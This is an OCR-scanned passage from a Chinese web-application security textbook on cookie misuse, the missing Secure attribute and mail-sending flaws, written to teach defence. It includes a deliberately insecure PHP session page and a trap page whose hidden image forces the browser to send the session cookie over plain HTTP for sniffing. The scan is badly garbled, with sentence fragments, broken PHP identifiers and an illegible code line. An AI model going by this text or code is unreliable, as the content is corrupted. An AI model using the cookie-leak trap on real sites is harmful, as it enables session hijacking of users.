本 节 将 首先 介绍 Cookie 的 正确 用 途 ， 即 Cookie 应 当 被 用 于 保存 会 话 ID ， 而 不 应 该 将 应 用 
的 数据 保存 在 Cookie 中 。 具 体 原因 在 后 面 会 进行 说 明 。 
接着 我 们 会 详细 讲述 输出 Cookie 时 容易 产生 的 安全 隐患 ， 有 如 下 两 种 。 
HTTP 消息 头 注 入 漏洞 
Cookie 的 安全 属性 设置 不 完善 
以 上 两 种 都 是 与 被 动 攻 击 相 关 的 安全 隐患 。HTTP 消息 头 注入 漏洞 在 4.7.2 节 中 已 经 做 过 介 
绍 。 而 Cookie 的 安全 属性 设置 不 完善 这 一 点 将 在 4.8.2 节 中 讲述 。 


























4.8.1 ”Cookie 的 用 途 不 当 


Web 应 用 中 需要 存储 包含 多 个 网 页 的 信息 时 ， 一般 会 使 用 PHP 或 Servlet 容 需 等 提供 的 
会 话 管理 机 制 。 通 常情 况 下 ， 会 话 管理 机 制 仅 将 会 话 ID 保存 至 Cookie， 而 将 数据 本 身 保 存在 
Web 服务 器 的 内 存 或 文件 、 数 据 库 中 。 如 果 在 Cookie 中 保存 了 不 该 保存 的 数据 ， 就 有 可 能 产生 
安全 隐患。 


令 不 该 保存 在 Cookie 中 的 数据 

下 面 我 们 来 看 一 下 因 在 Cookie 中 保存 了 不 恰当 的 内 容 而 引发 安全 隐患 的 情况 。 我 们 知道 ， 
外 界 无 法 更 改 会 话 变 量 ， 而 应 用 的 用 户 则 能 够 更 改 自己 的 Cookie 值 。 因 此 ， 如 果 将 不 希望 被 用 
户 擅自 更 改 的 数据 保存 在 Cookie 中 ， 就 有 可 能 会 导致 安全 隐患 。 

像 用 户 名 和 权限 信息 等 ， 就 是 不 可 以 被 用 户 擅自 更 改 的 数据 的 代表 性 例子 。 一 旦 将 这 些 信息 
保存 在 Cookie 中 ,就 有 可 能 出 现 用 户 越权 操作 或 越权 浏览 等 现象 。 详 情 请 参考 5.3 节 。 
































令 参 考 : 最 好 不 要 在 Cookie 中 保存 数据 的 原因 

尽管 将 数据 保存 在 Cookie 中 并 非 一 定 会 造成 安全 隐患 ,但 一 般 还 是 不 推荐 这 种 做 法 。 为 了 
解释 其 原因 ， 我 们 先 来 看 一 下 表 4-17 中 所 归纳 的 将 数据 保存 至 Cookie 和 使 用 会 话 变量 这 两 种 方 
法 的 比较 。 














4.8 


表 4-17 Cookie 和 会 话 变量 的 比较 


Cookie 输 昌 
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Cookie 会 话 变量 
易 用 性 通过 AP| 进行 取 什 和 赋值 5 普通 变量 的 用 法 基本 一 致 
存储 数组 或 对 象 需要 在 应 用 中 转换 为 字符 申 大 多 都 和 变量 一样 可 以 直接 赋值 
容量 限制 有 严格 的 限制 使 用 上 没有 限 
用 户 直接 查看 存储 的 信息 容易 不 可 能 
漏洞 等 导致 Cookie 泄漏 后 的 信息 港 ee 本 和 
a 2 Cookie 被 泄漏 后 信息 也 会 被 泄漏 ”| 可 以 通过 控制 使 信息 不 易 泄漏 
1 月 
数据 被 用 户 更 改 容易 不 可 能 
BA 如 果 有 XSS 或 HTTP 消息 头 注 入 等 漏 | 即使 有 可 导致 Cookie 被 更 改 的 漏洞 ， 
ee 洞 就 可 能 被 更 改 会 话 变量 也 无 法 被 更 改 
控制 信息 的 有 效 期 限 容易 仅 限 当前 会 话 
不 同 服 务 器 之 问 共享 信息 域名 相同 时 可 能 基本 不 可 能 























如 上 表 所 示 ， 使 用 会 话 变 
限 和 不 同 服务 器 之 间 共 享 信息 这 
使 用 会 话 变量 








会 话 变 量 之 所 以 可 以 通过 控制 使 信 
































可 以 要 求 用 户 

















次 输入 密码 (再 








信息 也 就 会 无 法 显示 。 而 将 信息 
另 一 方面 ， 如 果 需 要 保存 一 

















量 无 法 实现 而 使 用 Cookie 可 以 实现 的 项 目 ， 只 有 控制 信息 有 效 期 





这 两 点 。 除 此 以 外 ,会话 变 量 既 安 全 又 便利 ， 因 此 ， 














认证 )。 男 外 ， 会话 过 期 ( Session Timeout ) 后 ， 





一 般 来 说 最 好 


息 不 易 泄漏 ， 是 因为 在 Web 应 用 中 ， 在 显示 机 密 信 息 时 


保存 在 会 话 中 的 


保存 在 Cookie 中 的 情况 下 则 很 难 进行 这 样 的 控制 。 


一 些 横 跨 会 


话 和 服务 需 的 信息 ， 则 可 以 使 用 Cookie。 其 中 一 个 典 


型 的 案例 就 是 登录 页 面 的 “保持 登录 状态 ”功能 。 图 4-71 为 Google 的 登录 页 面 ， 密 码 框 下 有 


“保持 登录 状态 ”的 单 选 框 ， 


图 4-71 Google 的 登录 页 面 
使 用 您 的 Google 账户 登录 





电子 邮件 





密码 





[保持 登录 状态 




















需要 帮助 媳 一 一 


选中 它 后 就 会 通过 Cookie 保持 登录 状态 。 
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关于 如 何 实现 “保持 登录 状态 ”的 功能 ， 请 参考 5.1.4 节 。 另 外 ， 此 情况 下 Cookie 中 同样 也 
应 当 只 保存 随机 数 ， 称 为 令 牌 。 而 不 要 将 用 户 名 和 密码 等 “数据 ”保存 在 Cookie 中 。 认 证 状态 


等 信息 则 由 服务 器 来 管理 。 








专栏 : Padding Oracle 攻击 与 MS10-070 




















在 一 些 Web 应 用 开发 框架 中 ， 会 话 信 息 不 仅 会 被 保存 在 服务 器 端 ， 而 且 还 会 在 客户 端 以 

















hidden 参数 或 加 密 Cookie 的 形式 保存 。 其 中 一 个 典型 的 例子 就 是 ASP.NET， 它 的 页 面 状态 


( ViewState ) 被 保存 在 hidden 参数 中 ， 而 认证 状态 ( Form Authentication Ticket ) 则 被 保存 在 
而 且 这 些 值 都 会 使 用 RFC2040 算法 进行 加 密 。 


了 Cookie 中 。 
















































































然而 ， 在 2010 年 9 月 17 日 的 Ekoparty 安全 会 议 上 ，T.Duong 与 J.Rizzo 两 人 表示 通过 名 
为 Padding Oracle "的 攻击 方法 就 能 够 破解 这 些 加 密 信息 。 微 软 立 刻意 识 到 了 事态 的 严重 性 ， 成 
立 紧急 对 应 小 组 在 10 天 时 间 内 开发 出 了 对 应 的 


破例 对 外 紧急 提供 。 这 就 是 MS1 











而 从 这 个 事件 中 我 们 也 能 够 得 到 两 个 教训 。 





























0-070 安全 更 新 补丁 (2010 年 9 月 29 日 发 布 )。 















































补丁 程序 ， 并 打破 更 新 补丁 每 月 发 布 一 次 的 惯例 ， 
































第 一 ， 即 使 进行 了 加 密 ， 保 存在 客户 端的 信息 也 


























有 被 解密 的 风险 。 第 二 ， 平 台中 提供 的 会 话 管理 机 制 被 曝 出 安全 隐患 后 ， 需 要 在 最 短 时 间 内 将 问 





题解 决 。 有 关 平 台中 的 安全 隐患 的 对 应 措施 ， 请 参考 7.1 节 。 














令 参 考 





Fs 
人 Ekoparty 安全 会 议 上 发 表 的 幻灯 片 ( 英文 
http://netifera.com/reserch/poet/PaddingOraclesEverywhereEkoparty2010.pdf 





和 安全 性 公告 MS10-070“ASP.NET 的 安全 


) 

















局 洞 可 能 引发 信息 泄漏 ( 2418042 )” 


http://technet.microsoft.com/en-us/security/bulletin/MS10-070 


4.8.2 ”Cookie 的 安全 属性 设置 不 完善 


概要 





正如 第 3 章 中 介绍 的 那样 ，Cookie 中 含有 名 为 Secure 的 属性 (以 下 记 为 安全 属性 )， 指 定 了 
安全 属性 的 Cookie 仅 在 HTTPS 传输 的 情况 下 才 会 被 浏览 器 发 送 至 服务 器 。 而 如 果 Cookie 没有 
指定 安全 属性 ， 那 么 即使 应 用 中 使 用 了 HTTPS 传输 ，Cookie 也 仍然 有 可 能 会 以 明文 的 方式 传 
输 ， 这 样 就 会 有 被 监听 的 风险 。 





























Cookie 中 通 
攻击 。 


为 了 解决 Cookie 的 安全 属性 设置 不 完善 这 一 问题 ， 














常 保存 了 会 话 ID 等 事 关 安全 改 

















的 重要 信息 ， 因 此 一 旦 被 窍 听 就 会 直接 导致 伪装 








直接 的 对 策 就 是 设置 Cookie 的 安全 属 








和 其 


中 ”Padding Oracle 是 一 个 解密 手段 的 名 称 ， 与 著名 的 数据 库 Oracle 没有 关系 。 
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性 。 然 而 ， 有 些 网 站 同时 使 用 HTTP 与 HTTPS 两 种 传输 方式 ， 如 果 在 存 有 会 话 ID 的 Cookie 中 


设置 了 安全 属性 ， 应 用 就 可 能 会 运行 不 正常 。 这 种 情况 下 可 以 采取 以 下 解决 方法 ， 即 除了 使 用 会 











话 ID， 再 生成 一 个 令 牌 作为 设 有 安全 属性 的 Cookie， 并 在 每 个 HTTPS 页 面 中 确认 该 令 牌 值 。 
情 请 参考 本 节 的 “对 策 ”。 





Cookie 的 安全 属性 设置 不 完善 总 览 























产生 地 点 
包括 会 话 ID 在 内 的 所 有 生成 Cookie 的 地 方 
影响 范围 
二 所 有 使 用 HTTPS 传输 并 且 包 含 认 证 的 页 画 









































© 影响 类 型 
伪装 


” 影响 程度 
入 


用 户 参 与 程度 
仅 使 用 HTTPS 的 网 站 ， 需 要 ( 点击 链接 等 ) 
HTTP 和 HTTPS 混用 的 网 站 ， 不 需要 


























站 对 策 概 要 
BF 
一 设置 Cookie 的 安全 属性 
一 除了 使 用 会 话 ID， 再 生成 一 个 令 牌 作为 设 有 安全 属 ' 
该 令 牌 值 


调 























竹 的 Cookie， 并 在 每 个 HTTPS 页 面 中 确认 



































| 











攻击 手段 与 影响 











详 


下 面 我 们 就 来 看 一 下 针对 Cookie 的 安全 属性 设置 不 完善 这 一 问题 的 攻击 模式 与 其 造成 的 影 
响 。 本 书 事 先 为 读者 在 网 络 上 准备 了 使 用 HTTPS 并 且 生 成 不 带 安全 属性 的 Cookie ( PXPSESID ) 








的 网 页 ( https:/www.hash-c.co.jp/wasbook/set_non secure cookie.php )。 源 代码 如 下 。 


代码 清单 ”set_non_secure_cookie.php 














<?php 

ini_ set ('session.cookie secure'，'0'); // 关闭 安全 属性 
ini set ('session.cookie path'，'/wasbook/'); // 指定 路 径 
ini set ('session.name'，'PXPSESID'); // 更 改 会 话 ID 名 
session start(); // 会 话 开始 

$sid = session id(); // 取得 会 话 ID 

<html> 
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<body> 

会 话 已 经 开始 <br> 

PXPSESID = 

<?php echo htmlspecialchars ($sid, ENT NOQUOTES, 'UTF-8'); ?> 
</body> 

</html> 











此 页 面 被 托管 在 笔者 所 在 企业 的 主页 上 ， 为 了 防止 被 恶意 使 用 ， 这 里 采取 了 限定 Cookie 的 
路 径 和 更 改 默 认 会 话 ID 名 称 等 方法 。 
接 下 来 ,我们 就 来 体验 一 下 如 何 使 用 这 个 页 面 窃听 不 带 安全 属性 的 Cookie。 








启动 Fiddler 
2 a 浏览 器 中 就 被 设置 了 Cookie ( PXPSESID ) 
3. 访问 恶意 网 页 
4. 在 Fiddler 中 能 看 到 恶意 网 站 发 送 的 请 求 中 附带 了 Cookie 信息 





下 面 我 们 来 讲解 具体 的 流程 。 在 http://example.jp/48/ 的 菜单 (下 记 为 “/48/ 菜单 ”) 中 点 击 
“1.HTTPS 中 设置 Cookie (无 安全 属性 六 链接 ， 进 入 设置 Cookie 的 页 面 。 如 图 4-72 所 示 。 


4-72 设置 Cookie 的 页 面 


下 
感 https://www.hash-c.co.jp/wasbook/set_non_secure_cookie.php - Windows .ol 














GO v 同 https:AAwwww hash-c.co,jpAwasbook/set_non_secure_cookie.php ~ 久 颁 | x 





福安 加 https:jwwwwhash-ccojpAwasbookjset non... | 从 了 Wy 








七 ya-/ 在 开始 未 LL 大 
PXPSESID = Oftlctrlkcti Inv8didkolqihatO 

















此 时 ， 浏 览 器 中 就 被 设置 了 不 带 安全 属性 的 Cookie。 

接着 返回 到 /48/ 菜单 ， 点 击 “2.48-900: 浏览 恶意 网 站 ”链接 。 也 可 以 直接 输入 URLhttp:// 
trap.example.comy/48/48-900.html 进入 。 此 页 面 上 有 一 个 看 不 见 的 图 像 ( 高 度 和 宽度 都 设置 为 0 )， 
它 的 引用 地 址 为 http://www.hash-c.co.jp:443/wasbook/。 下 面 是 HTML 代码 。 














<body> 
恶意 网 页 
<img src="http://www.hash-c.co.jp:443/wasbook/" width="0" height="0"> 
</body> 











URL 中 的 端口 号 443 是 HTTPS 的 默认 端口 ， 但 由 于 指定 的 协议 为 http:， 因 此 该 请 求 在 被 发 
送 时 并 没有 进行 加 密 。 另 外 ， 虽 然 此 URL 指定 的 目标 中 不 存在 图 像 ， 但 由 于 目的 是 让 浏览 器 发 
送 Cookie， 所 以 就 算 没 有 图 像 ， 攻 击 也 照样 能 成 功 。 
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浏览 恶意 网 页 后 ，Fiddler 会 弹出 警告 (下 图 )， 这 里 不 用 管 它 直接 点 击 OK 按钮 "。 
-图 4-73 Fiddler 弹出 警告 后 点 击 OK 按钮 


HTTP Protocol Violation 辕 








Fiddler has detected a protocol violation in session #0, 


” Request's Host header does not match Host specified in URI, 


URL Host: www,hash-c.co.ip:443 
Header Host: www,hash-c.co,ip 


Note: You can disable this message using Tools | Fiddler Options ss 











过 下 图 就 能 够 查看 发 向 目标 网 站 的 HTTP 消息 。 


4-74 从 恶意 网 站 发 出 的 请 求 中 附带 了 Cookie 
光 Fiddler - HTTP Debugging Proxy ey)| 


File Edit Rules Iools Yiew Help 
Comment 好 Reissue X Remove » bp Resume All | 时 Streaming 县 AutoDecode 时 Process Fiiter 前 Find 区 Save | 和 愿 Launch IE 珍 clear Cache 


PRO [LO statistics | WM Inspectors | £ AutoResponder | 8 RequestBuder| 同 tog| 回 Fes| 三 Tene| 


Headers | Textview | WebForms | Hexyiew | Auth |[Raw | xML | 


















































玲 Result Protocol Host URL 


200 IHTIP example,ip 1481 (GET http://wan.hash-c.co. jp: 443/wasbooky HTTP/L.1 < 
304 HTTP example,ip IAccept: w/w 站 
辣 Referer: http://trap, example. com/48/48-900.html 

本 jAccept-Language: ja | 
UA-CPU: xs6 二 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilia/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; 
Sonnection; Keep-Alive 
Host: wew.hash-c.co. jp: 
cookie: TR jnvedidkolqjhqto -一 一 











4 [ 加 ] 上 


[Fn I View in Notepad | 


Transformer Headers TextView ImageView | HexView | Webyiew Auth Caching | Privacy | |Raw XML 
HTTF/1.0 200 This buggy server did not return headers 


<1DOCTYPE HTML PUBLIC "~-//IETF//DTO HTML 2.0//EN"> 

<html> <head> 

<title>400 Bad Request</title> 

</head> <body> 

<hi>Bad Request</h1i> 

<p>Your browser sent a request that this server could not understand.<br /> 

Reason: You're speaking plain HTTP to an ssL-enabled server port.<br /> 

Instead use the HTTPS scheme to access this URL, please.<br /> 

<blockquote>Hint: <a href="https://www.hash-c.co. jp/"><b>https://wwn.hash-c.co. jp/</b></a></blockquot 
</body> </html> 















































«| a ] ; 
| Find,,, I Wiew in Notepad 
| 睫 captung 三 则 Processes 114 httpijiwww.hash-c.co,jp:443fwasbooky 
L | 











在 恶意 网 站 使 用 443 端口 发 送 HTTP 请 求 (明文 ) 之 后 ， 原 本 应 该 使 用 HTTPS 进行 传输 的 
Cookie 值 在 未 经 加 密 的 情况 下 开始 在 网 络 上 传输 。 其 情形 如 下 图 所 示 。 


QD 使 用 Wireshark 确认 数据 包 后 ，Host 消息 头 中 的 端口 号 ( :443 ) 设置 没有 问题 ， 因 此 该 警告 或 许 是 Fiddler 的 Bug。 
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图 4-75 针对 Cookie 的 安全 属性 不 完善 实施 攻击 


受害 人 已 经 登录 攻击 
标 网 站 
名 浏览 恶意 网 ， 全 攻击 者 


(9 监听 HTTP 请 求 中 的 Cookie 






































httpVexample. 
jp:443/ 


而 一 旦 攻击 者 成 功 窃取 未 经 加 密 的 Cookie 值 ， 就 能 用 它 来 实施 会 话 劫持 。 


多 关于 抓 包 方法 的 注意 点 

此 处 讲述 的 监听 方法 中 网 络 传输 经 过 了 代理 ， 这 与 不 经 过 代理 时 的 条 件 略 有 不 同 。 

没有 经 过 代理 时 ， 浏 览 咒 与 Web 服务 器 直接 通信 ， 因 此 要 让 浏览 器 发 送 请 求 ， 就 需要 指定 
Web 服务 器 上 开放 的 端口 。 就 像 上 面 的 试验 中 指定 了 端口 号 443。 

而 通信 经 过 代理 时 ， 浏 览 器 的 所 有 请 求 都 会 先 发 送 到 代理 服务 器 。 因 此 ， 使 用 身 为 代理 的 
Fiddler 观测 时 ， 可 以 发 现 指定 443 以 外 的 端口 号 也 能 够 发 送 请 求 。 具 体 情形 如 下 图 所 示 。 











图 4-76 有 代理 和 无 代理 时 的 HTTP 请 求 观测 







































































经 过 代理 的 情况 
浏览 器 代理 服务 器 攻击 对 象 网 站 
能 对 任意 端 l 只 能 对 443 并 
发 送 请 求 [S| 。 发 关 请求 
仅 开放 443 端 
不 经 过 代理 的 情况 
浏览 器 攻击 对 象 网 站 
只 能 对 443 端口 发 送 请 求 
仅 开放 443 应 




















不 经 过 代理 的 HTTP 请 求 无 法 通过 Fiddler 等 代理 工具 进行 观测 ， 观 测 时 可 以 使 用 Wireshark 
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等 嗅 探 器 ( 抓 包 软件 )。 使 用 嗅 探 需 进 行 数据 包 解 析 的 技术 方法 请 参考 Chris Sanders 著 的 
《Wireshark 数据 包 分 析 实 战 》[1]。 


安全 隐患 的 产生 原因 
Cookie 的 安全 属性 设置 不 完善 的 直接 原因 显而易见 ， 就 是 没有 给 Cookie 设置 安全 属性 ， 以 
笔者 多 年 来 诊断 安全 隐患 的 经 验 来 看 ， 不 给 Cookie 设置 安全 属性 的 主要 原因 有 如 下 两 类 。 
开发 者 对 安全 属性 毫 不 知情 
设置 安全 属性 后 应 用 无 法 运行 
经 过 本 书 的 学 习 后 ， 相 信 第 一 类 原因 就 能 够 得 到 人 解决。 因此， 下 面 我 们 来 主要 讲述 设置 安全 
属性 后 应 用 无 法 运行 的 情况 。 



























































令 什 么 样 的 应 用 程序 不 能 在 Cookie 中 设置 安全 属性 

有 些 Web 应 用 同时 使 用 HTTP 和 HTTPS， 典 型 例子 为 电子 商务 网 站 。 多 数 电子 商 务 网 站 
中 ， 用 户 浏览 商品 页 面 时 使 用 的 是 HTTP 传输 ， 而 当 用 户 选择 完 商 品 进入 支付 阶段 时 使 用 的 则 是 
HTTPS。 图 4-77 即 展示 了 同时 使 用 HTTP 和 HTTPS 的 电子 商务 网 站 的 页 面 跳 转 情 况 。 























图 4-77 同时 使 用 HTTP 和 HTTPS 的 网 站 的 页 面 跳 转 



















































































商品 品 Si 输入 收 货 确认 
询 1 F 认 
类 别 商量 认证 ?地址 等 | | 购买 
| | 1 | 
说 品 s 天 
vy 2 HTTPS 页 面 
蜀 品 3 




















HTTP 页 面 

















Web 应 用 中 同时 使 用 HTTP 和 HTTPS 时 ， 为 保存 会 话 ID 的 Cookie 设置 安全 属性 是 非常 困 
难 的 。 因 为 设置 了 安全 属性 后 ，HTTP 传输 的 页 面 就 无 法 接收 到 Cookie 中 的 会 话 ID ， 因 此 也 就 
无 法 利用 会 话 管理 机 制 。 由 于 使 用 HTTP 的 网 页 为 了 实现 购物 车 等 功能 也 需要 利用 会 话 管理 机 
制 ， 因 此 当前 很 多 使 用 HTTPS 的 网 站 都 没有 设置 Cookie 的 安全 属性 。 

这 种 情况 下 ， 使 用 令 牌 是 一 种 行 之 有 效 的 对 策 。 详 情 会 在 稍 后 讲述 。 









































对 策 一 
为 了 解决 Cookie 的 安全 属性 设置 不 完善 这 一 问题 ， 最 直接 的 对 策 就 是 要 设置 Cookie 的 安全 
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令 给 保存 会 话 ID 的 Cookie 设置 安全 属性 的 方法 
在 PHP 中 给 保存 会 话 ID 的 Cookie 设置 安全 属性 ， 只 需 在 php.ini 中 设置 如 下 。 




















session.cookie secure = On 











Apache Tomcat 中 使 用 HTTPS 传输 请 求 时 ， 会 自动 给 保存 会 话 ID 的 Cookie 设置 安全 属性 。 
而 使 用 ASPNET 时 ， 则 需要 如 下 编辑 web.config 文件 。 





<configuration> 
<system.web> 
<httpcookies requireSsSsL="true" /> 
</system.web> 
</configuration 











令 使 用 令 牌 的 对 策 
无 法 给 保存 会 话 ID 的 Cookie 设置 安全 属性 时 ， 可 以 采用 通过 令 牌 来 防止 会 话 支持 的 方 
法 。 此 方法 与 4.6.4 节 中 讲述 对 策 时 介绍 的 方法 相同 。 将 保存 令 牌 值 的 Cookie 设置 安全 属性 后 ， 
HTTP 页 面 与 HTTPS 页 面 将 会 共享 会 话 变量 ， 而 即使 会 话 ID 被 窃听 ，HTTPS 页 面 也 能 够 防止 
会 话 劫持 。 
为 了 给 令 牌 的 Cookie 设置 安全 属性 ， 这 里 我 们 将 /463/46-015.php 按照 以 下 代码 进行 修改 。 
该 脚本 中 不 仅 加 上 了 安全 属性 ， 同 时 也 设置 了 HttpOnly 属性 。 












































dl 


代码 清单 ”/48/48-001.php 





<?php 
// /dev/urandom 通过 /dev/urandom 实现 伪 随 机 数 生 成 器 
function getToken() { 
$s = file get contents('/dev/urandom', false, NULL, 0, 24); 





return base64 encode ($s); 





// 假设 到 这 里 已 经 成 功 通过 认证 











session start(); 

session regenerate id(true); // 重新 生成 会 话 ID 
$token = getToken(); // 生成 令 牌 

// 生成 带 有 安全 属性 的 令 牌 cookie 

SeeeeakTme eokren ee Goren OU ne ue 
$_SESSION['token'] = $token; 





























然后 再 在 HTTPS 的 页 面 上 通过 以 下 脚本 检验 令 牌 值 。 内 容 与 /463/46-016.php 相同 。 
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代码 清单 ”/48/48-002.php 





<?php 
session start(); 
// 确认 用 户 名 【 省 略 】 
// 确认 令 牌 
$token = $ COOKIE['token']; 
if (! $token || $token != $ SESSION['token']) { 
die (' 认证 错误 。 令 牌 值 错误 。。') ; 
} 




















Ee 


<body> 伶 验 令 牌 ， 确 认 通 过 认证 。 </body> 











为 了 确认 上 面 的 脚本 ， 接 下 来 我 们 使 用 以 下 URL 来 浏览 页 面 





https://example.jp/48/48-001.php 








或 者 在 /48/ 菜单 中 点 击 “3.48-001: 生成 令 牌 (SSL 》” 链接 。 这 时 页 面 显 示 如 下 。 
图 4-78 试验 环境 中 即使 出 现 证 书 错误 也 依然 可 以 选择 继续 访问 























[外 证 书 错 许 导航 已 阻止 - Windows Internet Explorer [三 [加 | ¥ 
人 [htps//examplejp/48/48-001.php -|3|x|| ang P -| 
a | | IR(O) ~ 











名 此 网 站 的 安全 证 书 有 问题 。 








此 网 站 出 具 的 安全 证 书 不 是 由 受信 任 的 证 书 颁发 机 构 颁发 的 。 





安全 证 书 问题 可 能 显示 试图 获 骗 您 或 截获 您 向 服务 嚣 发送 的 数据 . 


建议 关闭 此 网 页 ， 并 且 不 要 继续 浏览 该 网 站 。 
入 单 击 此 处 关闭 该 网 页 。 


灸 继续 浏览 此 网 站 (下 推荐). 


加 更 多 信息 

















由 于 虚拟 机 中 无 法 附带 正规 证 书 ， 因 此 便 导 入 了 自 签 名 证 书 ， 这 也 是 出 现 上 图 错误 信息 自 
原因 。 而 考虑 到 是 虚拟 机 环境 ， 因 此 请 选择 “继续 浏览 此 网 站 ”。 a de 
7.2.3 节 。 
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4-79 ” 校 验 令 牌 方式 的 页 面 跳 转 








疙 https;//examplejp/48/48-001.php - Windows Internet Explorer 己 [ 回 | 灾 





























感 https//examplejp/48/48-002.php - Windows Internet Explorer IE 
GO - Er GO Fm 
帘 收 训 夫 | 态 htps//examplejp/48/48-001.php | 工 R) 帘 车 夫 。 | 税 httpsy/examplejp/48148-002.php | : IO 
认证 成 功 next 跳 转 检验 令 牌 后 ， 确 认 已 通过 认证 。 




















下 面 我 们 就 来 在 HTTP ( 非 SSL ) 中 尝试 此 页 面 跳 转 。 在 /48/ 菜单 中 点 击 “4.48-001: 生成 令 
牌 ( 非 SSL)” 链 接 。 结 果 为 ，48-001.php 中 显示 “认证 成 功 ” 后 ，48-002.php 中 显示 了 如 下 错误 
4-80 非 SSL 状态 下 无 法 收 到 令 牌 


息 http;//examplejp/48/48-002.php - Windows Internet Explorer 己 | 回 | ¥ 


























OO | htp//examplejp/ss/s8-002.php -|3|x| 回 sro PD- 
次 收 基 夫 | 夸 httpy//examplejp/48/48-002.php | 工具 (O) ~ 








认证 错误 。 令 牌 值 错误 。 














这 是 因为 ，48-001.php 中 生成 的 令 牌 值 被 保存 到 了 设置 了 安全 属性 的 Cookie 中 ， 因 此 非 SSL 
传输 时 48-002.php 就 没有 收 到 令 牌 。 也 就 是 说 ， 可 以 确认 安全 属性 运作 正常 。 


令 使 用 令 牌 能 确保 安全 性 的 原因 
即使 没有 设置 安全 属性 的 会 话 ID 被 窃听 ， 但 只 要 令 牌 值 设置 了 安全 属性 并 被 加 密 ，HTTPS 
幢 面 就 不 会 遭 到 会 话 动 持 。 原因 如 下 。 


服务 器 输出 令 牌 的 时 机 只 有 一 次 ， 即 认证 成 功 的 时 候 
令 牌 在 HTTPS 的 页 面 被 生成 《服务 顺 一 浏览 吉 ) 

令 牌 被 加 密 后 由 浏览 器 发 送出 去 (浏览 器 一 服务 器 ) 
浏览 HTTPS 的 页 面 必须 要 有 令 牌 


换言之 ， 令 牌 值 在 服务 器 和 浏览 器 之 间 传 输 时 都 进行 了 可 靠 的 加 密 ， 而 浏览 HTTPS 页 面 时 
需要 的 令 牌 值 不 可 能 被 第 三 方 得 知 ， 因 此 便 确 保 了 安全 性 。 















































除 安全 属性 外 其 他 属性 值 需 要 注意 的 地 方 


除了 安全 属性 之 外 ，Cookie 中 还 有 其 他 会 影响 安全 性 的 属性 。 第 3 章 中 已 经 介绍 了 Cookie 
的 属性 ， 因 此 这 里 将 主要 介绍 保存 会 话 ID 的 Cookie 的 属性 。 














令 Domain 属性 
Domain 属性 的 默认 状态 ( 即 不 指定 的 状态 ) 是 最 安全 的 。 只 有 在 多 台 服 务 需 中 共享 Cookie 
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时 才 需 要 指定 Domain 属性 ， 而 一 般 来 说 在 多 人 台 服务 器 间 共 享 会 话 ID 是 没有 意义 的 。 
虽然 PHP 中 能 够 指定 会 话 ID 的 Domain 属性 ,但 是 在 没有 特殊 理由 的 情况 下 ， 最 好 不 要 指 
定 Domain 属性 。 








人 Path 属性 
PHP 的 会 话 ID 默认 生成 path=/ 的 属性 。 一 般 情况 下 这 种 设置 不 会 有 问题 ， 而 如 果 要 针对 每 
个 路 径 生 成 不 同 的 会 话 ID ， 则 可 以 指定 Path 属性 。 
需要 注意 的 是 ， 即 使 指定 了 Path 属性 也 不 会 提高 安全 性 。 因 为 JavaScript 的 同 源 策 略 是 以 域 
名 为 单位 的 ， 而 不 是 以 路 径 为 单位 。 这 在 3.2 节 中 已 经 做 过 讲解 。 















































令 Expires 属性 
会 话 ID 的 Cookie 通常 不 指定 Expires 属性 ， 即 浏览 器 被 关闭 的 同时 Cookie 也 会 被 删除 。 设 
置 Expires 属性 后 ， 关 闭 浏览 器 后 也 照样 能 维持 认证 状态 。 详 细 的 使 用 方法 将 在 5.1.4 节 中 讲述 。 








S HttpOnly 属性 

设置 了 HttpOnly 属性 的 Cookie 无 法 通过 JavaScript 访问 。 但 由 于 JavaScript 访问 会 话 ID 
并 没有 什么 意义 ， 因 此 建议 每 次 都 给 Cookie 加 上 HttpOnly 属性 。 正 如 4.3 节 中 所 介绍 的 那样 ， 
HttpOnly 属性 有 助 于 减轻 跨 站 脚本 攻击 造成 的 损害 ， 但 这 并 不 是 根本 性 的 防范 策略 。 

PHP 中 给 会 话 ID 的 Cookie 设置 HttpOnly 属性 ， 只 需 如 下 编辑 php.ini。 















































session.cookie httponly = On 








总 结 


本 节 讲 述 了 Cookie 输出 的 相关 问题 。 其 中 有 两 点 非常 重要 的 是 ， 原 则 上 仅 将 Cookie 用 于 保 
存 会 话 ID， 以 及 使 用 HTTP 传输 的 应 用 中 给 Cookie 设置 安全 属性 。 
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4.9 发 送 邮 件 的 问题 








日 通常 使 用 邮件 的 方式 来 向 月 














Web 应 月 

















日 户 进行 确认 或 发 送 通 



































知 。 而 如 果 邮 件 发 送 功能 不 完善 ， 


就 可 能 会 导致 开放 转发 第 三 方 邮件 ,或 者 邮件 内 容 被 算 改 等 问题 。 本 节 就 将 讲述 邮件 发 送 功能 中 


产生 的 安全 隐患 。 


发 送 邮件 的 问题 概要 

与 发 送 邮件 相关 的 问题 有 如 下 三 项 。 
邮件 头 注入 漏洞 
使 用 hidden 参数 保存 收 件 人 信 ， 
邮件 服务 器 的 开放 转发 (参考 ) 


4.9.1 


自 


L233 





令 邮 件 头 注入 漏洞 
邮件 头 注入 是 指 ， 通 
































过 在 邮件 消息 中 的 收 件 人 或 标题 等 字段 中 插入 换行 符 ， 从 而 添加 新 的 邮 


件 头 字 段 或 筑 改 邮件 正文 的 攻击 手段 。 招 致 此 类 攻击 的 漏洞 即 称 为 邮件 头 注 入 漏洞 。 





、\ 














邮件 头 注 入 漏洞 将 于 4.9.2 节 详 细 电 
令 使 用 hidden 参数 保存 收 件 人 信息 


述 。 





在 一 些 用 来 免费 发 送 邮 件 的 表单 中 ,为 了 便于 自 定义 ， 有 时 会 将 邮件 的 收 件 人 等 信息 指定 为 


hidden 参数 ( 图 4-81 )。 


4-81 将 收 件 人 保存 在 hidden 参数 中 的 























表单 











<input type="hidden" name="mailaddr" 
value="root@example.jp"> 





























件 。 
或 者 被 保存 在 服务 右上 的 安全 场所 ( 如 文件 或 数据 库 等 )。 


通过 将 hidden 参数 中 的 收 件 人 更 改 为 任意 的 邮箱 地 址 ， 此 类 表单 就 能 够 被 用 了 
因此 ， 收 件 人 邮箱 地 址 等 信息 不 应 该 被 保存 在 hidden 参数 中 ， 而 是 应 该 硬 编码 在 源 代码 中 ， 





发送 垃圾 邮 
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令 参 考 : 邮件 服务 器 的 开放 转发 

邮件 服务 器 ( Mail Transfer Agent，MTA ) 的 设置 如 果 存 在 问题 ， 就 可 能 使 服务 器 的 角色 既 非 
